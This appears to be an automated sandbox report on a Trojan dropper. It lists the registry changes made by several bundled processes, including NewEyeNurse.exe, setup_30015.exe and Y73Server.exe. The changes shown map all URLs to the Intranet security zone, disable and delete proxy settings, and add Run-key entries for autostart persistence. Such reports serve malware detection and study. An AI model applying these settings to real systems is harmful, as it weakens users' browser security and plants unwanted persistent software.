[HKLM\System\CurrentControlSet\Hardware Profiles\0001\System\CurrentControlSet\Control\VIDEO\{F2D8DE3C-1784-446C-B5AC-74E9335F5D05}\0000]
"Attach.ToDesktop" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "deployPkg.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 89 D0 1D B4 3F 1A 64 E1 DC 28 A9 5B 0C AD F4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process deployPkg.exe:2488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 38 1B 18 69 B7 B1 E4 A5 0D 72 7D 1C C5 F4 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "deployPkg.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process NewEyeNurse.exe:3868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 89 6D E5 68 93 8F 10 2B 64 B3 53 A8 CF D1 43"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process eyeXzUvGuard_368.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NewEyeNurse.exe]
"updid" = "368"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NewEyeNurse.exe]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NewEyeNurse.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NewEyeNurse.exe]
"updins" = "d:\eyeXzUvGuard_368.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewEyeNurse]
"DisplayVersion" = "1.3.0.1315"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NewEyeNurse.exe]
"updjy" = "mac=00-0C-29-AC-63-98&ver=1.3.0.1315&soft_id=33&tuiguang_id=d:\eyeXzUvGuard_368.exe&yanzheng=68252c6241b5796c981b150435fb2d4e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewEyeNurse]
"URLInfoAbout" = "http://soft.i90ba.com/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewEyeNurse]
"Publisher" = "i90ba.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 69 25 2E DC 99 E1 B2 45 D2 8F 06 43 A3 76 C6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewEyeNurse]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NewEyeNurse.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NewEyeNurse.exe]
"updml" = "%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\"
"updrq" = "2015-7-25"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"EagleHealth368221555" = "%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NewEyeNurse.exe /deamon"
The process tusb_186_1.exe:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 76 05 7F DA 2F 0E BB 90 97 5F 01 5C 52 45 94"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:]
"copy%original file name%.exe" = "copyac795a38049d35af11e6f9c0ac670932"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1435237950"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 79 98 5C 57 E8 E1 3A 42 D1 CD 88 3C 14 D6 3B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup_30015.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\anote]
"anote" = "noteupdateservice"
"fixid" = "1"
[HKCR\Applications\anote.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"Names" = "noteupdateservice"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\anote\data]
"runtime" = "65000"
"LastVersion" = "1.26"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\anote]
"Version" = "1.26"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{F481F745-5C57-4f71-95B4-78546706C7A9}]
"QI" = "000C29AC6398473CB15AFACE13BDA36F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\anote]
"IconIndex" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1CC7C8ED-D96B-4BE5-9041-C144A8E5DB8F}]
"DisplayIcon" = "%Program Files%\anote\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1CC7C8ED-D96B-4BE5-9041-C144A8E5DB8F}]
"NoModify" = "1"
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1CC7C8ED-D96B-4BE5-9041-C144A8E5DB8F}]
"InstallDate" = "20140725"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 10 66 EA BF 45 D1 9D E6 45 5D FE 96 42 B8 E0"
[HKLM\SOFTWARE\anote]
"Count" = "1"
"instname" = "setup_30015.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\anote\data]
"rdata" = "bgQOVG8eWhYLCGQZGUQRVx5RC1YLBwF6TQJuawwQbhBTaAhBFWUYT2QdaRR5Gno4dg5KAmgYBUsxVBNNWENtFkhNGRsbFF4ZDhomCEtebUwGS25FCRoMRG0QG1FASBgUD0sIQ3ANQ19oH15ObxUPGl1NNxNIHRccHxQJGBQIIVceWTRSYFsoR0VaVgA7TEUNRQRqVUpGVAklSw=="
[HKLM\SOFTWARE\anote]
"(Default)" = "%Program Files%\anote"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1CC7C8ED-D96B-4BE5-9041-C144A8E5DB8F}]
"UninstallString" = "%Program Files%\anote\uninstall.exe _?=%Program Files%\anote"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1CC7C8ED-D96B-4BE5-9041-C144A8E5DB8F}]
"DisplayName" = "anote (v22.146kBuild)"
[HKLM\SOFTWARE\anote]
"Options" = "1"
[HKCR\Applications\Uninstall.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"InstallTime" = "2015725"
The process Y73Server.exe:2208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 AF FF 9D 01 96 62 BD 12 41 8A 2C 4F 2F 5D 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Y73ÖÖ×ÓËÑË÷ÉñÆ÷" = "%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process JSZS.exe:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\JiSuZhuShou]
"Renwucan1" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\JiSuZhuShou]
"instd" = "42210"
"RwWtD" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\JiSuZhuShou]
"cid" = "-9019431321599"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\JiSuZhuShou]
"xk" = "4294967295"
"ctm" = "CC 3B 75 A7 5D 9C E4 40"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\JiSuZhuShou]
"insg" = "2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 42 98 91 FE 3C 9C C8 F2 D6 74 0A DE BD 09 39"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
